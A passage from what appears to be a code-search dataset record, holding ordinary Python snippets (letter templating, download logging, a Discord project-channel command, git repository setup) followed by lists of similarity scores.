syntax).\n conditions = re.finditer(CONDITION_REGEX, match)\n for index, condition in enumerate(conditions):\n skill_type = condition.group(2)\n skill = condition.group(3)\n text = condition.group(4)\n\n # If the skill is empty, treat it as a catch all case.\n if not skill or skill in self._lookup(skill_type):\n template = template.replace(match, text)\n break\n\n letter += template\n\n return letter", "def new_create_log_message(incident_name: str, **kwargs) -> str:\r\n incident_type, incident_code = incident_name.split()\r\n url_name_list = kwargs[\"url_name_list\"] if \"url_name_list\" in kwargs else None\r\n url_name = kwargs[\"url_name\"].lower() if \"url_name\" in kwargs else None\r\n url_path = kwargs[\"url_path\"].lower() if \"url_path\" in kwargs else None\r\n\r\n incidents = {\r\n \"Info\": [\r\n \"JSON was decode\",\r\n f\"Package was download from URL: { url_path }\"\r\n ],\r\n \"Warning\": [\r\n \"JSON is not valid\",\r\n f\"JSON did not loaded from URL: { url_path }\"\r\n ],\r\n \"Error\": [\r\n f\"No version was found in { url_name_list }\",\r\n f\"Package download error from URL: { url_path }\"\r\n ],\r\n \"Disaster\": [\r\n \"No one package was downloaded\"\r\n ]\r\n }\r\n yield f\"{ datetime.now() } -- { incident_type } \\t { url_name }:\\t { incidents[incident_type][int(incident_code)] }\"", "async def create(self, ctx, name: str,\n owner: discord.Member = None) -> discord.Message:\n if ctx.projects.find_project(name):\n project = ctx.projects.find_project(name)\n if ctx.guild.get_Channel(int(project.get(\"channel\"))):\n return await ctx.send(\"A project with that name exists.\")\n else:\n await ctx.send(\"A project with this name exists but, a related\"\n \" project channel was not found. \"\n \"I will be overwriting the previous project.\")\n ctx.projects.delete_project(name)\n\n owner = owner if owner else ctx.author\n if not ctx.bot.db(\"guilds\").find(str(ctx.guild.id)):\n ctx.bot.db(\"guilds\").insert(str(ctx.guild.id), ctx.bot.empty_guild)\n\n # await ctx.send(\"Creating project channel...\")\n if not ctx.bot.db(\"guilds\").find(\n str(ctx.guild.id)).get(\"project_category\"):\n overwrites = {\n ctx.guild.default_role: discord.PermissionOverwrite(\n read_messages=False\n ),\n ctx.me: discord.PermissionOverwrite(\n read_messages=True,\n send_messages=True,\n manage_channels=True\n )\n }\n category = await ctx.guild.create_category(\"Flux Projects\",\n overwrites=overwrites)\n ctx.bot.db(\"guilds\").update(str(ctx.guild.id), {\n \"project_category\": str(category.id)})\n\n else:\n category = ctx.guild.get_channel(\n int(ctx.bot.db(\"guilds\").find(\n str(ctx.guild.id)).get(\"project_category\")))\n\n overwrites = {owner: discord.PermissionOverwrite(read_messages=True,\n send_messages=False,\n add_reactions=True),\n ctx.me: discord.PermissionOverwrite(read_messages=True,\n send_messages=True),\n ctx.guild.default_role: discord.PermissionOverwrite(\n read_messages=False)}\n\n channel = await ctx.guild.create_text_channel(f\"{name}-project\",\n category=category,\n overwrites=overwrites)\n await channel.send(f\"Project Owner: {owner}\")\n message = await channel.send(self.empty_progress_bar)\n await message.pin()\n res = ctx.projects.create_project(\n owner.id, owner.id, name, channel.id, message.id)\n if not res:\n return await ctx.send(\"An error has occurred. 
Use `.contact`\"\n \" with error: `ERR_PROJECT_STILL_EXISTS`\")\n return await ctx.send(\"Project created!\")", "def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)" ]
[ "0.58265114", "0.56810087", "0.56475306", "0.54282033", "0.53819776", "0.5301259", "0.52773494", "0.5231186", "0.5216202", "0.5213242", "0.5183639", "0.517318", "0.5149136", "0.5134215", "0.512786", "0.5119132", "0.5117917", "0.50955975", "0.50477743", "0.5016975", "0.50106007", "0.4991806", "0.49911693", "0.49719685", "0.49669358", "0.49572024", "0.49344993", "0.49300116", "0.49111474", "0.48781097" ]
0.5991317
0
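For context on the positive document above: it assumes a `get_open_issues` helper and a `jira_url` accessor on the same class, neither of which is part of the record. A minimal sketch of how that helper could be backed by the real `jira` client library (the class name, credential handling, and the JQL filter are assumptions for illustration):

```python
# Hypothetical backing for the do_jira_case_commit_message document above;
# only jira.JIRA and JIRA.search_issues are real library APIs here.
from jira import JIRA

class JiraShell:
    def __init__(self, server: str, user: str, token: str):
        self._server = server
        self._client = JIRA(server=server, basic_auth=(user, token))

    def jira_url(self) -> str:
        return self._server

    def get_open_issues(self):
        # JQL: unresolved issues assigned to the authenticated user,
        # matching the "cases currently assigned to you" query string.
        return self._client.search_issues(
            "assignee = currentUser() AND resolution = Unresolved")
```

Each returned issue exposes `issue.key` and `issue.fields.summary`, which is exactly what the document's list comprehension reads.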
Lambda function handler for getting trash day
def lambda_handler(event, context) -> dict: logging.info('Starting function with context=%s and event=%s', context, event) date = event['date'] holiday_schedule = trash_schedule_service.get_schedule() trash_day = trash.next_trash_day(date, holiday_schedule) logging.info('Completed function with response=%s', trash_day) return trash_day
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lambda_handler(event, context):\n logging.info('Starting function with context=%s and event=%s', context, event)\n holiday_schedule = trash.holidayschedule()\n old_holiday_schedule = trash_service.list()['data']\n old_holidays = [old_holiday['name'] for old_holiday in old_holiday_schedule]\n logging.info('Updating holiday schedule with schedule=%s', holiday_schedule)\n update_schedule(old_holidays, holiday_schedule)", "def delete_UI_transaction_day(account):\n\t_day = read_day()\n\tdeleted = delete_transaction_day(account, _day)\n\tif (not deleted):\n\t\tprint('Nu s-a efectuat nici o stergere.')\n\telse:\n\t\tprint('Stergere finalizata.')", "def on_delete(self, req, resp):\n try:\n days_to_retain = int(req.params[\"days\"])\n except Exception:\n days_to_retain = 90\n\n try:\n retention_status = self.state_manager.task_retention(\n retain_days=str(days_to_retain))\n if not retention_status:\n resp.status = falcon.HTTP_404\n return\n resp.text = \"Tables purged successfully.\"\n except Exception as e:\n self.error(req.context, \"Unknown error: %s\" % (str(e)))\n resp.text = \"Unexpected error.\"\n resp.status = falcon.HTTP_500\n return\n resp.status = falcon.HTTP_200", "def do_rt(self, arg):\n self.do_timesheet('report today')", "def do_upt(self, arg):\n self.do_timesheet('update today')", "def reminders_soon(request):\n now = timezone.now()\n soon = now + timedelta(days=2)\n return Task.objects.filter(\n user=request.user, reminder__lt=soon, reminder_seen=False, done=False).exclude(folder='trash')", "def next_regular_trash_day(date: str) -> str:\n parsed_date = parser.parse(date)\n day_of_week = parsed_date.weekday()\n\n if day_of_week < TRASH_DAY:\n delta = TRASH_DAY - day_of_week\n elif day_of_week == TRASH_DAY:\n delta = 0\n else:\n delta = 7 - (day_of_week - TRASH_DAY)\n\n next_trash_date = parsed_date + datetime.timedelta(days=delta)\n return next_trash_date.strftime('%Y-%m-%d')", "def test_calendar_query_todo_alarm(self):\n raise SkipTest(\"test unimplemented\")", "def weekday(self, *args, **kwargs): # real signature unknown\r\n pass", "def delete_events(usrservice,calservice):\r\n print(args.action, args.inuser, 'celendar events')", "def lambda_handler(event, context):\n try:\n day = datetime.datetime.now().weekday()\n\n fetcher = assume_role()\n config = fetch_config_from_s3(fetcher)\n print config\n\n if is_weekday(day, config['schedule']['halfDay']):\n client = assume_role()\n for role_arn in config['role_arns']:\n account_number = role_arn.split(\":\")[4]\n ec2_user = create_temp_user(client, role_arn)\n\n start_up_time, stop_time, now, tz = convert_to_datetime(config['times'])\n logger.info(\"Lambda started for account : {}\".format(config['account_names'][account_number]))\n start_stop(now, start_up_time, stop_time, ec2_user, config, tz)\n else:\n logger.info(\"I do not operate on weekends.\")\n except Exception as error:\n logger.info(\"Lambda failed to run with the following error : {}\".format(error))", "def next_trash_day(date: str, holidays: list) -> dict:\n next_regular = next_regular_trash_day(date)\n weekdays = get_weekdays(next_regular)\n default_trash_day = {'type': 'default', 'schedule': calendar.day_name[TRASH_DAY]}\n if holiday.contains_holiday(weekdays):\n holiday_name = holiday.get_holiday(weekdays)\n find_holiday = list(filter(lambda holiday_delays: holiday_delays['name'] == holiday_name, holidays))\n if len(find_holiday) > 0:\n trash_day = {'type': 'holiday', 'holiday': holiday_name, 'schedule': find_holiday[0]['routeDelays']}\n else:\n trash_day = 
default_trash_day\n else:\n trash_day = default_trash_day\n\n return trash_day", "def get_day():\n return handle_invalid_inputs(question_4, days)", "def del_calender_event():\n return jsonify(None)", "def call_fut(self, node):\r\n fut = duedate.get_extended_due_date\r\n return fut(node)", "def day_of_the_week(arg):", "def lambda_handler(event, context):\n if event.get('zipcode') and event.get('country') and event.get('job'):\n data = get_current_temperature(event['zipcode'], event['country'])\n send_to_badash(event['job'], data)\n else:\n print('Error: no zipcode and/or country and/or job supplied!')\n exit(-1)", "def one_day(status, after):\n return woo.fetch_all_orders(status, after)", "def schedule_handler(userdata, *args):\n\t\tfor event in database.devschedule(userdata[\"cursor\"], args[0]):\n\t\t\tprint(str(event))\n\t\t\n\t\tprint(\"\")", "def ticket_deleted(self, ticket):", "def fnight(var, wrapper, message):\n if var.PHASE != \"day\":\n wrapper.pm(messages[\"not_daytime\"])\n else:\n hurry_up(0, True)", "def todo(self):\n # sort events with eventid using datetime string\n pass", "def for_day_request_handler(handler_input: HandlerInput) -> Response:\n log.info(\n f\"forDay: session_attributes={handler_input.attributes_manager.session_attributes}\"\n )\n intent = handler_input.request_envelope.request.intent\n when = intent.slots.get(\"WHEN\")\n log.info(f\"forDay: when.value={when.value}\")\n if when.value:\n day = date_parser.parse(when.value)\n day = datetime(day.year, day.month, day.day)\n else:\n day = events.get_date()\n text = events.for_day(day)\n log.info(f\"forDay events for {day} = {text}\")\n\n return (\n handler_input.response_builder.speak(text)\n .set_card(SimpleCard(f\"Hillbrook events for {day.strftime('%A')}:\\n{text}\"))\n .set_should_end_session(True)\n .response\n )", "def getTrash(self):\n return self.trash", "def list_1day_renu(self,fday,tday):\n dayList = self._list_day(fday, tday)\n return zip(dayList,[self._get_ndays_renu(d,1) for d in dayList])", "def extra_tasks_for_today(self):\n localtz = tzlocal()\n datetime_today = datetime.fromtimestamp(rospy.get_rostime().to_sec(), tz=localtz)\n day_today = datetime_today.strftime(\"%A\")\n date_today = datetime_today.date()\n rospy.loginfo('Looking for daily tasks for %s, %s' % (day_today, date_today))\n \n eight_forty_five= time(8,45, tzinfo=localtz)\n eleven_thirty= time(11,30, tzinfo=localtz)\n fourteen_thirty=time(14,30, tzinfo=localtz)\n seventeen_fifteen= time(17,15, tzinfo=localtz)\n past_bedtime = time(23,59, tzinfo=localtz)\n \n # day_end = seventeen_fifteen\n day_end = past_bedtime\n\n\n\n metric_wps=['WayPoint13', 'WayPoint18', 'WayPoint9','WayPoint11','WayPoint5','WayPoint3'] \n object_learn_wps=['WayPoint13', 'WayPoint18', 'WayPoint9', 'WayPoint11'] \n object_search_wps=['WayPoint1', 'WayPoint2', 'WayPoint3']\n door_wps=['WayPoint7', 'WayPoint4']\n \n morning_start = eight_forty_five\n morning_duration = delta_between(eleven_thirty, morning_start)\n \n lunch_start = eleven_thirty\n lunch_duration = delta_between(fourteen_thirty, lunch_start)\n\n afternoon_start = fourteen_thirty\n afternoon_duration = delta_between(day_end, afternoon_start)\n\n tasks = []\n \n #door checks at fixed times (to evaluate system ability to do stuff at corret times)\n task=create_door_check_task(door_wps[0])\n start_time=datetime.combine(date_today, time(10,30, tzinfo=localtz))\n end_time = start_time+timedelta(seconds=30)\n task.start_after=rospy.Time(unix_time(start_time))\n 
task.end_before=rospy.Time(unix_time(end_time))\n tasks.append(task)\n \n task=create_door_check_task(door_wps[0])\n start_time=datetime.combine(date_today, time(13,30, tzinfo=localtz))\n end_time = start_time+timedelta(seconds=30)\n task.start_after=rospy.Time(unix_time(start_time))\n task.end_before=rospy.Time(unix_time(end_time))\n tasks.append(task)\n \n task=create_door_check_task(door_wps[0])\n start_time=datetime.combine(date_today, time(16,30, tzinfo=localtz))\n end_time = start_time+timedelta(seconds=30)\n task.start_after=rospy.Time(unix_time(start_time))\n task.end_before=rospy.Time(unix_time(end_time))\n tasks.append(task)\n \n \n #random tasks\n for i in range(4):\n #morning\n task=create_metric_map_task(random.choice(metric_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n task=create_door_check_task(random.choice(door_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n if i<3:\n task=create_object_learn_task(random.choice(object_learn_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n task=create_object_search_task(random.choice(object_search_wps))\n self.set_random_task_time(task, date_today, morning_start, morning_duration)\n tasks.append(task)\n \n #lunch (less tasks because we want the robot mostly learning people tracks)\n if i<1:\n task=create_metric_map_task(random.choice(metric_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n task=create_door_check_task(random.choice(door_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n task=create_object_learn_task(random.choice(object_learn_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n task=create_object_search_task(random.choice(object_search_wps))\n self.set_random_task_time(task, date_today, lunch_start, lunch_duration)\n tasks.append(task)\n \n \n #afternoon\n task=create_metric_map_task(random.choice(metric_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n \n task=create_door_check_task(random.choice(door_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n \n if i<3:\n task=create_object_learn_task(random.choice(object_learn_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n \n task=create_object_search_task(random.choice(object_search_wps))\n self.set_random_task_time(task, date_today, afternoon_start, afternoon_duration)\n tasks.append(task)\n return tasks", "def lambda_handler(event, content):\n imap = email_startup()\n status, messages = imap.select('Inbox')\n days_old = input('Enter many days ago do you want to use as the cutoff?: ')\n new_date = get_days_old(days_old)\n messages = apply_filter(imap, new_date)\n initial_unread = get_unread_count(imap)\n print(f'Initial unread emails: {initial_unread}')\n print(f'Emails to be filter: {len(messages)}')\n a_pause = input('Continue by pressing enter.')\n\n print(f'Processing {len(messages)} unread emails from before {new_date}')\n print(\"=\"*100)\n process_messages(imap, messages)\n print(\"=\"*100)\n\n # Determine results from script\n post_unread = get_unread_count(imap)\n print(f'Processed Emails: {initial_unread - post_unread}')\n 
print(f'After processing, there are {post_unread} unread emails.')\n\n # close the connection and logout\n imap.close()\n imap.logout()", "def day(d):\n\t\tx = db.cquery(\"day\",d)\n\t\tprint \"Total:\", x[0]\n\t\tf = raw_input(\"[L]ist [N]ew overview or [B]ack to home \").lower()\n\t\tif f == \"l\":\n\t\t\tfor i in x[1]:\n\t\t\t\tprint ui.statsid(), i[0], i[1], \" \", ui.statstimein(), i[2], ui.statstimeout(), i[3]\n\t\t\traw_input(\"[Enter] to go back to search\")\n\t\t\thome_stats()\n\t\telif f == \"n\":\n\t\t\thome_stats()\n\t\telif f == \"b\":\n\t\t\thome()\n\t\telse:\n\t\t\tpass", "def ENTRY(entry_code):\n\tif check_user(entry_code) ==True:\n\t\t###workday = Workday.objects.filter(date=get_time()).get()\n\t\tenter_workday(entry_code)", "def lambda_handler(event, context):\n # By default, treat the user request as coming from the America/New_York time zone.\n os.environ['TZ'] = 'America/New_York'\n time.tzset()\n #logger.debug('event.bot.name={}'.format(event['bot']['name']))\n\n return dispatch(event)" ]
[ "0.6090012", "0.54774374", "0.5461324", "0.5409436", "0.53761524", "0.53742063", "0.5331051", "0.5287995", "0.51901144", "0.5178555", "0.5161938", "0.5114322", "0.5079114", "0.50751776", "0.5070596", "0.50560266", "0.50401527", "0.50214356", "0.49688548", "0.49537805", "0.49516058", "0.4899427", "0.48943612", "0.48820135", "0.48690954", "0.48539737", "0.48517373", "0.48436627", "0.48372668", "0.48182443" ]
0.74920136
0
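The delta arithmetic in the `next_regular_trash_day` negative above is easy to sanity-check in isolation. A self-contained sketch (the `TRASH_DAY = 4` constant, i.e. Friday, and the sample date are assumptions, since the constant's value is not shown in the record):

```python
# Standalone sketch of the weekday-delta logic from the negatives above.
import datetime

from dateutil import parser

TRASH_DAY = 4  # assumed: Friday (datetime.weekday() counts Monday as 0)

def next_regular_trash_day(date: str) -> str:
    parsed_date = parser.parse(date)
    day_of_week = parsed_date.weekday()
    if day_of_week <= TRASH_DAY:   # on or before trash day this week
        delta = TRASH_DAY - day_of_week
    else:                          # already past it; roll to next week
        delta = 7 - (day_of_week - TRASH_DAY)
    return (parsed_date + datetime.timedelta(days=delta)).strftime("%Y-%m-%d")

print(next_regular_trash_day("2024-07-01"))  # Monday -> "2024-07-05" (Friday)
```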
Convert an image from LAB color space to XYZ color space
def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:
    l, a, b = tf.unstack(image, axis=-1)

    var_y = (l + 16) / 116
    var_x = a / 500 + var_y
    var_z = var_y - b / 200
    var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),
                     (var_x - 16 / 116) / 7.787)
    var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),
                     (var_y - 16 / 116) / 7.787)
    var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),
                     (var_z - 16 / 116) / 7.787)

    ref_x = 95.047
    ref_y = 100.00
    ref_z = 108.883

    x = var_x * ref_x
    y = var_y * ref_y
    z = var_z * ref_z

    xyz_image = tf.stack([x, y, z], axis=-1)
    return xyz_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def XYZ_to_Lab(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n temp_x = cobj.xyz_x / illum[\"X\"]\r\n temp_y = cobj.xyz_y / illum[\"Y\"]\r\n temp_z = cobj.xyz_z / illum[\"Z\"]\r\n \r\n if temp_x > color_constants.CIE_E:\r\n temp_x = math.pow(temp_x, (1.0 / 3.0))\r\n else:\r\n temp_x = (7.787 * temp_x) + (16.0 / 116.0) \r\n\r\n if temp_y > color_constants.CIE_E:\r\n temp_y = math.pow(temp_y, (1.0 / 3.0))\r\n else:\r\n temp_y = (7.787 * temp_y) + (16.0 / 116.0)\r\n \r\n if temp_z > color_constants.CIE_E:\r\n temp_z = math.pow(temp_z, (1.0 / 3.0))\r\n else:\r\n temp_z = (7.787 * temp_z) + (16.0 / 116.0)\r\n \r\n lab_l = (116.0 * temp_y) - 16.0\r\n lab_a = 500.0 * (temp_x - temp_y)\r\n lab_b = 200.0 * (temp_y - temp_z)\r\n return LabColor(\r\n lab_l, lab_a, lab_b, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb_to_lab(image: tf.Tensor) -> tf.Tensor:\n xyz = rgb_to_xyz(image)\n lab_image = xyz_to_lab(xyz)\n return lab_image", "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def example_lab_to_xyz():\r\n\r\n print(\"=== Simple Example: Lab->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.22)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n xyz = convert_color(lab, XYZColor)\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def lin_a98rgb_to_xyz(rgb: Vector) -> Vector:\n\n return alg.dot(RGB_TO_XYZ, rgb, dims=alg.D2_D1)", "def xyz_to_lab(image: tf.Tensor) -> tf.Tensor:\n x, y, z = 
tf.unstack(image, axis=-1)\n\n refx = 95.047\n refy = 100.00\n refz = 108.883\n\n var_x = x / refx\n var_y = y / refy\n var_z = z / refz\n\n var_x = tf.where(var_x > 0.008856, tf.pow(var_x, 1 / 3),\n (7.787 * var_x) + (16 / 116))\n var_y = tf.where(var_y > 0.008856, tf.pow(var_y, 1 / 3),\n (7.787 * var_y) + (16 / 116))\n var_z = tf.where(var_z > 0.008856, tf.pow(var_z, 1 / 3),\n (7.787 * var_z) + (16 / 116))\n\n l = (116 * var_y) - 16\n a = 500 * (var_x - var_y)\n b = 200 * (var_y - var_z)\n lab_image = tf.stack([l, a, b], axis=-1)\n return lab_image", "def rgb_to_xyz(rgb_color):\n\n r = (rgb_color[0] / 255)\n g = (rgb_color[1] / 255)\n b = (rgb_color[2] / 255)\n\n if r > 0.04045:\n r = ((r + 0.055) / 1.055) ** 2.4\n else:\n r = r / 12.92\n\n if g > 0.04045:\n g = ((g + 0.055) / 1.055) ** 2.4\n else:\n g = g / 12.92\n\n if b > 0.04045:\n b = ((b + 0.055) / 1.055) ** 2.4\n else:\n b = b / 12.92\n\n r = r * 100\n g = g * 100\n b = b * 100\n x = (r * 0.4124) + (g * 0.3576) + (b * 0.1805)\n y = (r * 0.2126) + (g * 0.7152) + (b * 0.0722)\n z = (r * 0.0193) + (g * 0.1192) + (b * 0.9505)\n\n return x, y, z", "def RGB_to_XYZ(RGB,\n illuminant_RGB,\n illuminant_XYZ,\n RGB_to_XYZ_matrix,\n chromatic_adaptation_transform='CAT02',\n decoding_cctf=None):\n\n if decoding_cctf is not None:\n RGB = decoding_cctf(RGB)\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n transform=chromatic_adaptation_transform)\n\n XYZ = dot_vector(RGB_to_XYZ_matrix, RGB)\n\n XYZ_a = dot_vector(M, XYZ)\n\n return XYZ_a", "def RGB_to_XYZ_matrix(self):\n\n if not self._use_derived_RGB_to_XYZ_matrix:\n return self._RGB_to_XYZ_matrix\n else:\n return self._derived_RGB_to_XYZ_matrix", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def hlab_to_xyz(hlab: Vector, white: VectorLike) -> Vector:\n\n xn, yn, zn = alg.multiply(util.xy_to_xyz(white), 100, dims=alg.D1_SC)\n ka = CKA * alg.nth_root(xn / CXN, 2)\n kb = CKB * alg.nth_root(zn / CZN, 2)\n l, a, b = hlab\n l /= 100\n y = (l ** 2) * yn\n x = (((a * l) / ka) + (y / yn)) * xn\n z = (((b * l) / kb) - (y / yn)) * -zn\n return alg.divide([x, y, z], 100, dims=alg.D1_SC)", "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def colorize_xyz(xyz):\n xyz_vis = xyz - xyz.min()\n return (255 * xyz_vis / xyz_vis.max()).astype(np.uint8)", "def rgb2alpha(img):\n\t### First of all we need the size of our picture to make the transforms\n\n\tx = len(img) ; y = len(img[0])\n\talpha = np.full((x, y, 3), 0, dtype = float)\t\t## This will be the 
transformed image\n\n\t### Now we gotta access each pixel of the picture\n\n\tfor i, vi in enumerate(img):\n\t\tfor j, px in enumerate(vi):\n\t\t\t### There we are\n\n\t\t\t# Step 1 : LMS transform, for that we use r_l\n\n\t\t\talpha[i][j] = np.matmul(r_l, px)\n\n\t\t\t# Step 2 : log em all (decimal log)\n\n\t\t\talpha[i][j][0] = log(alpha[i][j][0])\n\t\t\talpha[i][j][1] = log(alpha[i][j][1])\n\t\t\talpha[i][j][2] = log(alpha[i][j][2])\n\n\t\t\t# Step 3 : l alpha beta transform, by using l_a\n\n\t\t\talpha[i][j] = np.matmul(l_a, alpha[i][j])\n\n\treturn alpha", "def Luv_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n # Without Light, there is no color. Short-circuit this and avoid some\r\n # zero division errors in the var_a_frac calculation.\r\n if cobj.luv_l <= 0.0:\r\n xyz_x = 0.0\r\n xyz_y = 0.0\r\n xyz_z = 0.0\r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)\r\n\r\n # Various variables used throughout the conversion.\r\n cie_k_times_e = color_constants.CIE_K * color_constants.CIE_E\r\n u_sub_0 = (4.0 * illum[\"X\"]) / (illum[\"X\"] + 15.0 * illum[\"Y\"] + 3.0 * illum[\"Z\"])\r\n v_sub_0 = (9.0 * illum[\"Y\"]) / (illum[\"X\"] + 15.0 * illum[\"Y\"] + 3.0 * illum[\"Z\"])\r\n var_u = cobj.luv_u / (13.0 * cobj.luv_l) + u_sub_0\r\n var_v = cobj.luv_v / (13.0 * cobj.luv_l) + v_sub_0\r\n\r\n # Y-coordinate calculations.\r\n if cobj.luv_l > cie_k_times_e:\r\n xyz_y = math.pow((cobj.luv_l + 16.0) / 116.0, 3.0)\r\n else:\r\n xyz_y = cobj.luv_l / color_constants.CIE_K\r\n\r\n # X-coordinate calculation.\r\n xyz_x = xyz_y * 9.0 * var_u / (4.0 * var_v)\r\n # Z-coordinate calculation.\r\n xyz_z = xyz_y * (12.0 - 3.0 * var_u - 20.0 * var_v) / (4.0 * var_v)\r\n\r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, illuminant=cobj.illuminant, observer=cobj.observer)", "def linear_rgb2xyz(rgb):\n arr = _prepare_colorarray(rgb).copy()\n return _convert(xyz_from_rgb, arr)", "def rgb_to_xy(red, green, blue):\n\n # gamma correction\n red = pow((red + 0.055) / (1.0 + 0.055), 2.4) if red > 0.04045 else (red / 12.92)\n green = pow((green + 0.055) / (1.0 + 0.055), 2.4) if green > 0.04045 else (green / 12.92)\n blue = pow((blue + 0.055) / (1.0 + 0.055), 2.4) if blue > 0.04045 else (blue / 12.92)\n\n # convert rgb to xyz\n x = red * 0.649926 + green * 0.103455 + blue * 0.197109\n y = red * 0.234327 + green * 0.743075 + blue * 0.022598\n z = green * 0.053077 + blue * 1.035763\n\n # convert xyz to xy\n x = x / (x + y + z)\n y = y / (x + y + z)\n\n # TODO check color gamut if known\n \n return [x, y]", "def RGB_to_XYZ_matrix(self, value):\n\n if value is not None:\n value = np.asarray(value)\n self._RGB_to_XYZ_matrix = value", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def sRGBFromLab(lab):\n return xyzTosRGB(labToXYZ(lab, [0.9504559, 1, 1.089058]))", "def 